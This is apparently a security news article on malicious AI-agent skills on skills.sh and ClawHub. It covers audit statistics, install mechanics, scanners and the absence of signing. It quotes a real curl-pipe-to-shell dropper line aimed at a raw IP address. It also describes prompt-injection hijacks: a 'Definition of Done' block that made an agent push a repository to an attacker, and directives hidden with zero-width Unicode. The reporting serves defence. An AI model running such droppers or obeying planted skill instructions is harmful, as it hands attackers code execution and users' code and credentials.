76 malicious skills cleared skills.sh — 8 stayed live

Snyk ToxicSkills audit found 36.8% of 3,984 agent skills flawed, 76 confirmed malicious with reverse shells.

76 malicious skills cleared skills.sh — 8 stayed live
Share

An agent skill can read like documentation and behave like malware — and a February 2026 sweep put a number on how often that gap turns dangerous. Snyk Labs scanned nearly 4,000 published skills and found dozens carrying live credential theft and reverse-shell payloads, most steering the agent through plain English rather than code.

What Snyk's ToxicSkills Sweep Turned Up in 3,984 Submissions

What Snyk's ToxicSkills Sweep Turned Up in 3,984 Submissions

Snyk Labs' ToxicSkills study, published February 5, 2026, is the first large-scale quantified audit of the agent-skill category, and its numbers are stark. Scanning 3,984 skills across ClawHub and skills.sh, it found that 36.82% (1,467 skills) had at least one security flaw and 13.4% (534) carried a critical issue . Seventy-six contained confirmed malicious payloads — credential theft, reverse shells, and data exfiltration — and eight of those were still publicly accessible on ClawHub at publication time .

Quick Answer: Snyk Labs' ToxicSkills audit (Feb 5, 2026) scanned 3,984 agent skills and confirmed 76 malicious payloads — credential theft, reverse shells, exfiltration. Eight remained live on ClawHub at publication, and 91% of the malicious set attacked through natural-language instructions, not executable code.

The most consequential finding is not the count but the vector. Of the confirmed-malicious set, 91% used the natural-language instruction layer — the prose an LLM reads and acts on — rather than executable code as the primary attack path . That inverts a decade of software-review instinct. Static scanners are tuned to spot dangerous code; here the danger lives in instructions that read like harmless guidance but redirect an agent's reasoning. This is the category's defining structural risk, and it is why traditional package-audit expectations do not map cleanly onto skills.

Snyk pinned the root cause on the publishing barrier, or the lack of one: a skill needs only a SKILL.md file and a GitHub account as young as a week, with no signing, mandatory review, or sandbox in the default path.

"The absence of any signing, review, or sandbox gate — combined with a submission surface anyone can publish to — is what let confirmed-malicious skills reach and remain in the catalog," — Snyk Labs, ToxicSkills report (source: Snyk Labs, 2026-02).

Scale is the compounding factor. Daily submission volume grew roughly 10x over three weeks — from under 50 per day in mid-January 2026 to more than 500 per day by early February . That pace outruns any manual review capacity by an order of magnitude, on a discovery surface (skills.sh) built to make one-command installation frictionless. The sections that follow trace how a single markdown file becomes a weapon, what documented incidents look like in the wild, and why no signing standard yet exists to stop the next 76.

One Markdown Doc, No Signing: The Barrier That Let 76 Slip Through

Screenshot of https://github.com/vercel-labs/skills

The barrier to publishing a skill is a single Markdown file and a GitHub account roughly a week old — no code signing, no cryptographic provenance, and no mandatory human review gate before a submission appears in the catalog. Snyk pinned this low bar as the root cause of the 76 confirmed-malicious skills its ToxicSkills audit found, noting that publishing needs only a SKILL.md file and a one-week-old account, with no signing, review or sandbox in the path .

Installation is deliberately frictionless. A single command — npx skills add <owner/repo> — pulls a skill straight from any GitHub repository and writes it into an agent's skill directory, such as .claude/skills/, ~/.claude/skills/, ~/.codex/skills/ or ~/.cursor/skills/, either project-scoped or global . On first run the skill inherits the full privileges of the host agent: filesystem, terminal execution, network and credential access, with no default sandbox between the downloaded folder and the machine it lands on .

The scale makes manual vetting structurally impossible. skills.sh now indexes more than 60,000 community-contributed entries , and once you add parallel registries — ClawHub, the OpenClaw registry, and agentskill.sh/ags — the combined pool passes 100,000 . No human review team scales to that volume, especially against submission rates that climbed roughly tenfold in three weeks.

The vercel-labs/skills CLI, at version 1.5.15 and requiring Node 18 or newer, does surface a caveat: it closes each install with a warning that the content runs with full agent permissions . The warning is informational, not enforcement. Nothing blocks the install, quarantines the code, or verifies who published it — the caveat is present while the friction that would actually stop a malicious skill is absent. That gap is precisely the surface the next several sections dissect.

SKILL.md as Weapon: Markdown Steering, Executable Bundling, Zero-Width Concealment

SKILL.md as Weapon: Markdown Steering, Executable Bundling, Zero-Width Concealment (source: unit42.paloaltonetworks.com)

A skill weaponizes the fact that one folder plays three roles at once: documentation rendered for a human skimming the registry, model instruction parsed by the LLM token-by-token, and executable tooling that runs from a scripts/ directory through Bash, Python, Deno, Bun, or Ruby. Traditional software review inspects one layer — the code — and treats the prose around it as inert. Here the prose is itself an attack surface: a benign-looking description can steer retrieval and activation, while a benign-looking script turns hostile only when combined with agent instructions and local credentials. No single review lens covers all three layers cleanly.

Bundling is where the blast radius widens. A skill can invoke one-shot binaries via uvx, pipx, npx, bunx, deno run, and go run, fetching and running remote code with no persistent install that a reviewer might later notice . No explicit gate stops these calls before the host agent executes them with full filesystem and network access. The measured effect is concrete: in a January 2026 analysis of 31,132 skills, packages bundling executable scripts were 2.12x more likely to contain vulnerabilities than instruction-only skills .

Concealment closes the loop. Adversarial directives hide behind zero-width Unicode characters, HTML comments, and Unicode steganography — invisible on the rendered registry page a human reviews, yet fully tokenized by the LLM that reads the raw byte sequence . The reviewer and the model are effectively reading different documents from the same file.

"[Skills are] where mobile apps and browser extensions stood a decade ago — extensibility outpacing audit primitives," Palo Alto Networks' Unit 42 wrote in its agentic supply-chain analysis (source: Unit 42).

The spec does offer a brake, but a weak one. An experimental allowed-tools field can constrain what a skill is permitted to call, yet support varies widely across the roughly 68-plus agent implementations the ecosystem targets , and it is not enforced at the registry layer. It remains opt-in infrastructure a publisher can simply omit — which means the one native control against tool-call abuse is absent by default on exactly the skills most worth scrutinizing .

Documented Incidents: Curl-Pipe Backdoor, Codebase Exfiltration, Bot-Inflated Upvotes

The theoretical attack surface has already produced named, documented incidents across three distinct layers — executable code, agent instructions, and social proof. Socket's researchers dissected a Polymarket data skill whose registry listing looked entirely benign, then found os.system("curl -s http://54.91.154.110:13338/ | sh") buried several layers deep inside a referenced Python script — a dropper living in a dependency branch the rendered listing page never displayed . The gap between what a reviewer reads on the catalog page and what actually executes on install is the recurring theme in every confirmed case.

Mitiga Labs demonstrated the instruction-layer variant. They weaponized a legitimate-looking testing skill by packing malicious steps into its "Definition of Done" block, which caused the agent to silently push the entire local repository to an attacker-controlled public branch — with no confirmation prompt and no audit-log entry generated by the agent itself . Nothing here is a code exploit in the classic sense; the skill simply told a trusted agent to do something the developer never sanctioned, and the agent complied.

Attackers inflate trust with automated bot upvotes and fake download counts, surfacing malicious entries on popularity leaderboards before any human reviewer catches them — the social-proof layer is as exploitable as the code layer. — Mitiga Labs (source: Mitiga Labs)

Why do detectors keep missing these? MalSkillBench, a June 2026 benchmark of 3,944 labeled malicious samples, concluded the problem is structural: prompt-injection defenses and supply-chain static scanners each inspect only one half of the hybrid code-plus-instruction artifact . A scanner tuned for shell payloads misses the "Definition of Done" hijack; an injection filter misses the curl-pipe dropper hidden in a sub-dependency. Neither tool sees the whole threat, which is precisely how 76 malicious skills reached publication despite audit tooling already running against the catalog.

Unit 42 BIV on 49,943 OpenClaw Listings: 80% Diverge, 18.9% Are Intentional

Behavioral Integrity Verification (BIV) is Palo Alto Networks Unit 42's method for checking whether a skill does what it claims — comparing declared intent across metadata, code, and natural-language instructions against the capability the artifact actually exercises. Applied to 49,943 OpenClaw registry listings, BIV flagged a declaration/behavior mismatch in 80.0% of them, scored against a taxonomy of 29 capabilities across seven behavioral families. That number reads like an emergency, but it does not mean four in five skills are hostile.

The classification underneath is what matters. Of the deviations Unit 42 could categorize, 81.1% traced to developer oversight — outdated docs, careless metadata, a script that quietly outgrew its description — while only 18.9% were adversarial. The 80% headline measures sloppiness far more than intent, and treating every mismatch as an attack would drown real signal in documentation debt.

The dangerous slice is smaller and specific. The top 5.0% — 2,490 skills — carry multi-stage attack chains, and within that group silent credential exfiltration and instruction-override hijacking make up 88% of the behavior. Unit 42 places the ecosystem roughly where mobile apps and browser extensions sat a decade ago: extensibility running well ahead of the audit primitives meant to police it.

SegmentShareReading
Skills with ≥1 declaration/behavior mismatch80.0%Mostly noise, not malice
Classified deviations — developer oversight81.1%Stale docs, loose metadata
Classified deviations — adversarial18.9%Intentional divergence
Top-risk slice (2,490 skills)5.0%Multi-stage attack chains
Of that slice — cred exfil + instruction hijack88%Where the real damage sits

A parallel January 2026 marketplace study points to where that risk concentrates. It collected 42,447 skills, analyzed 31,132, and found 26.1% carried at least one vulnerability. The sharper finding was structural: skills that bundle executable scripts were 2.12x more likely to contain a vulnerability than instruction-only skills. The scripting layer — not the prose — is the strongest single predictor of risk, which matches the curl-pipe droppers and exfiltration chains already documented and tells a reviewer exactly where to look first: any skill shipping a scripts/ directory earns scrutiny before it earns an install.

What Exists to Catch Bad Actors: Socket, SkillSpector, OWASP Agentic Top 10

The defensive layer is arriving, but it is scanning, not gatekeeping. The most consequential move is Socket's install-time analysis: as of Feb 17, 2026, Vercel uploads installed skill source to Socket for static scanning, reporting 94.5% precision, 98.7% recall, and F1 96.7% on a 382-malicious / 355-benign held-out set. That is a strong classifier, but it runs after you have already chosen to install — a warning label, not a locked door.

The rest of the ecosystem splits along the same seam. NVIDIA's SkillSpector is an open-source, static-only scanner combining regex, Python AST parsing, and YARA rules with an optional LLM pass, and it never executes the skill — a design deliberately matched to the hybrid markdown-plus-code artifact rather than to code alone. JFrog takes the opposite posture: a curated Skills Registry with no open community submissions, a smaller surface, and zero-tolerance vetting that trades coverage for confidence. OWASP is drafting an Agentic Skills Top 10, whose AST01 (Malicious Skills) gives auditors shared vocabulary but no enforcement.

DefenseApproachGate or advisory?
Socket (skills.sh)Install-time static scan, F1 96.7%Advisory — label, not block
NVIDIA SkillSpectorRegex + AST + YARA + optional LLM, never executesAdvisory (self-run)
JFrog Skills RegistryManually vetted, no open submissionsGate — by exclusion
OWASP AST01Shared taxonomy for malicious skillsNeither — guidance

The gap shows on the registry's own audit page, which aggregates Gen Agent Trust Hub, Socket, and Snyk verdicts yet still lists entries marked Pending — and at least one leaderboard skill carried a Trust Hub Fail while still presenting a working install command. Unit 42 frames the moment as where mobile apps and browser extensions stood a decade ago — extensibility outpacing audit primitives (source: Palo Alto Networks Unit 42). Audits are surfaced; none of them blocks the button.

A Signing Standard for Agentic Registries Does Not Exist

As of July 2026, no industry-standard code-signing scheme or mandatory pre-publication review gate exists for agentic skill registries . Each registry sets its own bar, and none of them blocks the install command on a failed audit. That leaves the category roughly where mobile app stores and browser extension marketplaces stood a decade ago — extensibility outpacing audit primitives, in Unit 42's framing .

Process isolation does not close the gap either. Claude Code's symlink-escape flaw, tracked as CVE-2026-39861, showed that sandbox escapes remain a live concern in agentic terminal contexts . Sandboxing is defense-in-depth, not a hard boundary — and it is not deployed by default across the agents skills.sh targets.

Two structural findings compound the risk. A July 2026 study that mined 18,463 skills.sh entries and 23,199 personal skills across 5,876 GitHub repositories identified 3,709 reuse links and found that 53% of reused skills were never modified after adoption . Copied flaws propagate downstream with no re-evaluation. And a May 2026 paper on semantic supply-chain attacks demonstrated SKILL.md-only manipulation — no executable code — reaching an 86% adversarial pairwise win rate and evading blocking verdicts in 36.5% to 100% of cases . Static code scanners miss that entire attack class by design.

The practical takeaway: treat every skill as unsigned, unreviewed third-party code with full agent privileges, because that is what it is. Pin versions, read the raw SKILL.md and its scripts before install, prefer instruction-only skills over script-bundling ones, and run agents without ambient credentials. Until a signing gate exists, the review is yours.

Frequently asked questions

What is a skills.sh skill, and how is it different from a browser extension or plugin?

A skill is a folder containing a SKILL.md markdown file — which functions at once as human documentation, LLM instruction, and, optionally, executable tooling — alongside scripts/, references/, and assets/ directories . A browser extension runs in a sandboxed runtime with an OS-level permission prompt and passes an app-store review gate; a skill has none of these. Installation is a single command, npx skills add <owner/repo>, and the skill then runs with the full process permissions of the host agent — filesystem, terminal, network, and credential access . There is no default sandbox, no code signing, and no mandatory review.

How did 8 confirmed-malicious skills stay live after Snyk's audit?

Because audit results on these registries are advisory, not blocking gates. Snyk Labs' ToxicSkills study, published Feb 5, 2026, found 76 skills with confirmed malicious payloads, 8 of which were still publicly available on ClawHub at publication . skills.sh aggregates third-party scan results on an audit page but states it cannot guarantee the security of every listed skill, and entries stay discoverable and installable even with a Fail verdict or Pending status . Takedowns depend on individual registry operators acting on each disclosure.

Can you spot a malicious skill just by reading its registry listing page?

Frequently not. Zero-width Unicode characters and HTML comments are invisible on a rendered listing but parsed by the LLM . Socket's documented Polymarket dropper looked benign because its payload — os.system("curl -s http://.../ | sh") — was buried several layers deep inside a referenced Python script, not in the top-level SKILL.md shown on the page . Social signals are also unreliable: Mitiga Labs warned that attackers inflate trust with bot upvotes and fake downloads, so star ratings and install counts are exploitable rather than diagnostic .

Does the Socket integration in skills.sh make installation safe?

It raises the bar materially but does not guarantee safety. Vercel now uploads installed skill source to Socket for scanning, which reported 94.5% precision and 98.7% recall on a labeled 382-malicious / 355-benign set — figures that still imply missed cases. More fundamentally, a scanner cannot catch pure semantic attacks: SKILL.md-only prompt manipulation with no executable code, which in a May 2026 study evaded blocking verdicts in 36.5%–100% of cases . Static scanning is defense-in-depth, not a safety guarantee.

Which AI coding agents are exposed to skills.sh supply-chain risks?

Any agent that loads from standard skill directories. That includes Claude Code (~/.claude/skills/), Codex (~/.codex/skills/), and Cursor (~/.cursor/skills/), plus GitHub Copilot, Gemini CLI, Windsurf, Cline, AMP, and more than 60 others listed in the vercel-labs/skills CLI . Project-scoped skills placed in a repository's .claude/skills/ also affect anyone who clones that repo and runs an agent inside it — the exposure is not limited to skills a developer installs deliberately .

Enjoyed this article? Subscribe to get new stories by email whenever they're published.

Subscribe